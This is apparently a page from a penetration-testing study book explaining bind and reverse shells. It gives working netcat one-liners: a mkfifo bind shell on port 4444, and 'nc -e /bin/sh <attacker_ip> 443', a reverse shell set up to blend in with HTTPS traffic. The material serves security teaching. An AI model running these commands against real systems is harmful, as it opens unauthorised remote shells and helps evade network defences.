Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Shells and Payloads

Bind Shells

A shell listens on the compromised system for incoming connections.

Challenges with bind shells

  • Firewalls may block incoming connections.
  • NAT can complicate direct connections.
  • A shell will need to be started on the target system beforehand.
  • May require elevated privileges to bind to certain ports.

Establish a bind shell with netcat

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l -p 4444 > /tmp/f

then connect from your machine:

nc <target_ip> 4444

Reverse Shells

The compromised machine connects back to a listener on the attackers machine. This has a better chance of success because outbound connections are rarely filtered or blocked. A firewall with DPI (Deep Packet Inspection) may be able to detect and block this traffic.

Establish a reverse shell with netcat

On our machine, setup the listener:

/bin/bash$ nc -lp 443

We use the common port https/443 to blend in with normal traffic. On the target machine, run:

/bin/bash$ nc -e /bin/sh <attacker_ip> 443